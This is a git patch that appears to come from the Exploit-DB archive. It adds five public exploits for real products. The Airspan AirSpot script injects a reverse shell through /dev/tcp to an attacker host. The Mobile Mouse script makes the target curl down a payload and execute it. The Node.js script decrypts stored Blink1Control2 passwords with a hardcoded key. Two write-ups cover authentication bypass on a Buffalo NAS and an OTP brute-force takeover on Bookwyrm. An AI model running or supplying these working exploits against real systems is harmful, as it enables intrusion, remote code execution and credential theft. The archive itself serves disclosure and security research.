From 7cbe771564cfd29cbc140607647ebc26b3aefa83 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 21 Sep 2022 05:01:54 +0000 Subject: [PATCH] DB: 2022-09-21 5 changes to exploits/shellcodes Blink1Control2 2.2.7 - Weak Password Encryption Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE) Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE) Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass Bookwyrm v0.4.3 - Authentication Bypass --- exploits/hardware/webapps/51012.txt | 91 +++++++++++++++++++++++++++++ exploits/linux/remote/51011.py | 79 +++++++++++++++++++++++++ exploits/multiple/local/51014.js | 67 +++++++++++++++++++++ exploits/multiple/webapps/51013.txt | 18 ++++++ exploits/windows/remote/51010.py | 66 +++++++++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 326 insertions(+) create mode 100644 exploits/hardware/webapps/51012.txt create mode 100755 exploits/linux/remote/51011.py create mode 100644 exploits/multiple/local/51014.js create mode 100644 exploits/multiple/webapps/51013.txt create mode 100755 exploits/windows/remote/51010.py diff --git a/exploits/hardware/webapps/51012.txt b/exploits/hardware/webapps/51012.txt new file mode 100644 index 000000000..da58442b6 --- /dev/null +++ b/exploits/hardware/webapps/51012.txt @@ -0,0 +1,91 @@ +# Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass +# Date: 2022-08-11 +# Exploit Author: JORDAN GLOVER +# Type: WEBAPPS +# Platform: HARDWARE +# Vendor Homepage: https://www.buffalotech.com/ +# Model: TeraStation Series +# Firmware Version: 1.66 +# Tested on: Windows 10 + + +An authentication bypass vulnerability found within the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device, allows an unauthenticated malicious actor to gain administrative privileges. + +The web interface can be accessed via port 80 or 443 via a web browser. Once accessed you will be presented with a login page, that requires a username and password to gain authentication to the NAS. + +Using a proxy tool to intercept the request and responses, it was possible re-intercept the response and modify the JSON data, contained within the body. + +If you modify the "success" to 'true' and change "Pagemode" to '0', this will grant you authentication with administrator privileges, to the NAS. + + +POC #1 Authentication Failure + +Request +POST /dynamic.pl HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded +Content-Length: 45 +Origin: http://localhost +Connection: close +Referer: http://localhost/static/index.html + +bufaction=verifyLogin&user=Jordan&password=Jordan + + +Response +HTTP/1.1 200 OK +Content-type: text/html +Pragma: no-cache +Cache-Control: no-store, no-cache, must-revalidate +Cache-Control: post-check=0, pre-check=0 +Expires: Thu, 01 Dec 1994 16:00:00 GMT +Connection: close +Date: Mon, 30 Jun 2008 02:39:51 GMT +Server: lighttpd/1.4.32 +Content-Length: 94 + +{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]} + +Incorrect Username or Password + + + +POC #2 Authentication Success + +Request +POST /dynamic.pl HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded +Content-Length: 45 +Origin: http://localhost +Connection: close +Referer: http://localhost/static/index.html + +bufaction=verifyLogin&user=Jordan&password=Jordan + + +Intercepted Response +HTTP/1.1 200 OK +Content-type: text/html +Pragma: no-cache +Cache-Control: no-store, no-cache, must-revalidate +Cache-Control: post-check=0, pre-check=0 +Expires: Thu, 01 Dec 1994 16:00:00 GMT +Connection: close +Date: Mon, 30 Jun 2008 02:39:51 GMT +Server: lighttpd/1.4.32 +Content-Length: 94 + +{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]} + +Login Successful \ No newline at end of file diff --git a/exploits/linux/remote/51011.py b/exploits/linux/remote/51011.py new file mode 100755 index 000000000..87f3ca137 --- /dev/null +++ b/exploits/linux/remote/51011.py @@ -0,0 +1,79 @@ +# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE) +# Date: 7/26/2022 +# Exploit Author: Samy Younsi (NSLABS) (https://samy.link) +# Vendor Homepage: https://www.airspan.com/ +# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf +# Version: 0.3.4.1-4 and under. +# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu) +# CVE : CVE-2022-36267 + +from __future__ import print_function, unicode_literals +import argparse +import requests +import urllib3 +urllib3.disable_warnings() + +def banner(): + airspanLogo = """ + ,-. + / \ `. __..-,O + : \ --''_..-'.' + | . .-' `. '. + : . .`.' + \ `. / .. + \ `. ' . + `, `. \ + ,|,`. `-.\ + '.|| ``-...__..-` + | | Airspan + |__| AirSpot 5410 + /||\ PWNED x_x + //||\\ + // || \\ + __//__||__\\__ +'--------------'Necrum Security Labs + +\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m + FOR EDUCATIONAL PURPOSE ONLY. + """ + return print('\033[1;94m{}\033[1;m'.format(airspanLogo)) + +def pingWebInterface(RHOST, RPORT): + url = 'https://{}:{}'.format(RHOST, RPORT) + try: + response = requests.get(url, allow_redirects=False, verify=False, timeout=30) + if response.status_code != 200: + print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') + exit() + print('[INFO] Airspan device web interface seems reachable!') + except: + print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') + exit() + + +def execReverseShell(RHOST, RPORT, LHOST, LPORT): + payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT) + data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload) + try: + print('[INFO] Executing reverse shell...') + response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False) + print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT)) + return + except Exception as e: + print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT) + return False + +def main(): + banner() + args = parser.parse_args() + pingWebInterface(args.RHOST, args.RPORT) + execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False) + parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True) + parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True) + parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) + parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) + main() \ No newline at end of file diff --git a/exploits/multiple/local/51014.js b/exploits/multiple/local/51014.js new file mode 100644 index 000000000..c1caf4440 --- /dev/null +++ b/exploits/multiple/local/51014.js @@ -0,0 +1,67 @@ +// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption +// Date: 2022-08-12 +// Exploit Author: p1ckzi +// Vendor Homepage: https://thingm.com/ +// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7 +// Vulnerable Version: blink1control2 <= 2.2.7 +// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11. +// CVE: CVE-2022-35513 +// +// Description: +// the blink1control2 app (versions <= 2.2.7) utilises an insecure method +// of password storage which can be found by accessing the /blink1/input url +// of the api server. +// password ciphertext for skype logins and email are listed +// and can be decrypted. example usage: +// node blink1-pass-decrypt +#!/usr/bin/env node +const {ArgumentParser} = require('argparse'); +const simpleCrypt = require('simplecrypt'); + +function exploit() { + const BANNER = '\033[36m\n\ + _ _ _ _ _\n\ + | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\ + | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\ + | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\ + |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\ + |_|\n\ + _ _\n\ + __| | ___ ___ _ __ _ _ _ __ | |_\n\ + / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\ + | (_| | __| (__| | | |_| | |_) | |_\n\ + \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\ + |___/|_|\033[39m'; + + const PARSER = new ArgumentParser({ + description: 'decrypts passwords found at the /blink/input url ' + + 'of the blink1control2 api server (version <= 2.2.7 ).' + }); + PARSER.add_argument('ciphertext', { + help: 'encrypted password string to use', type: 'str' + }); + let args = PARSER.parse_args(); + + // supplied ciphertext is decrypted with same salt, password, and method + // used for encryption: + try { + let crypt = simpleCrypt({ + salt: 'boopdeeboop', + password: 'blink1control', + method: 'aes-192-ecb' + }); + let ciphertext = args.ciphertext; + let decrypted = crypt.decrypt(ciphertext); + console.log(BANNER); + console.log('\033[32m[+] decrypted password:\033[39m'); + console.log(decrypted); + } + catch (TypeError) { + console.log('\033[33m[!] the submitted hash was invalid.\033[39m'); + } + finally { + process.exit(1); + } +} + +exploit() \ No newline at end of file diff --git a/exploits/multiple/webapps/51013.txt b/exploits/multiple/webapps/51013.txt new file mode 100644 index 000000000..a78dc28da --- /dev/null +++ b/exploits/multiple/webapps/51013.txt @@ -0,0 +1,18 @@ +# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass +# Date: 2022-08-4 +# Exploit Author: Akshay Ravi +# Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm +# Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3 +# Version: <= 4.0.3 +# Tested on: MacOS Monterey +# CVE: CVE-2022-2651 +# Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/ + +Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection + +# Steps to reproduce: + +1. Create a acount with victims email id +2. When the account is created, its ask for email confirmation via validating OTP +Endpoint: https://site/confirm-email +3. Enter any random OTP and try to perfrom bruteforce attack and if otp matches, We can takeover that account \ No newline at end of file diff --git a/exploits/windows/remote/51010.py b/exploits/windows/remote/51010.py new file mode 100755 index 000000000..ba1bb7470 --- /dev/null +++ b/exploits/windows/remote/51010.py @@ -0,0 +1,66 @@ +# Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE) +# Date: Aug 09, 2022 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://mobilemouse.com/ +# Software Link: https://www.mobilemouse.com/downloads/setup.exe +# Version: 3.6.0.4 +# Tested on: Windows 10 Enterprise LTSC Build 17763 + +#!/usr/bin/env python3 + +import socket +from time import sleep +import argparse + +help = " Mobile Mouse 3.6.0.4 Remote Code Execution " +parser = argparse.ArgumentParser(description=help) +parser.add_argument("--target", help="Target IP", required=True) +parser.add_argument("--file", help="File name to Upload") +parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") + +args = parser.parse_args() + +host = args.target +command_shell = args.file +lhost = args.lhost +port = 9099 # Default Port + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) + +CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04") +s.send(CONN) +run = s.recv(54) + +RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") +s.send(RUN) +run = s.recv(54) + +sleep(0.5) + +download_string= f"curl http://{lhost}:8080/{command_shell} -o +c:\Windows\Temp\{command_shell}".encode('utf-8') +hex_shell = download_string.hex() +SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + +"4b45591e2d311e454e5445521e04") +s.send(SHELL) +shell = s.recv(96) + +print ("Executing The Command Shell...") + +sleep(1.2) +RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") +s.send(RUN2) +run2 = s.recv(54) + +shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') +hex_run = shell_string.hex() +RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + +"4b45591e2d311e454e5445521e04") +s.send(RUN3) +run3 = s.recv(96) + +print (" Take The Rose") + +sleep(10) +s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dd1547ed4..a65117062 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11492,6 +11492,7 @@ id,file,description,date,author,type,platform,port 50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows, 50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows, 50985,exploits/windows/local/50985.txt,"Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path",1970-01-01,"Angelo Pio Amirante",local,windows, +51014,exploits/multiple/local/51014.js,"Blink1Control2 2.2.7 - Weak Password Encryption",1970-01-01,p1ckzi,local,multiple, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18722,6 +18723,8 @@ id,file,description,date,author,type,platform,port 50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows, 51000,exploits/linux/remote/51000.txt,"uftpd 2.10 - Directory Traversal (Authenticated)",1970-01-01,"Aaron Esau",remote,linux, 51005,exploits/multiple/remote/51005.py,"PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UnD3sc0n0c1d0,remote,multiple, +51010,exploits/windows/remote/51010.py,"Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)",1970-01-01,"Chokri Hammedi",remote,windows, +51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -45071,3 +45074,5 @@ id,file,description,date,author,type,platform,port 51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php, 51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php, 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple, +51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware, +51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple,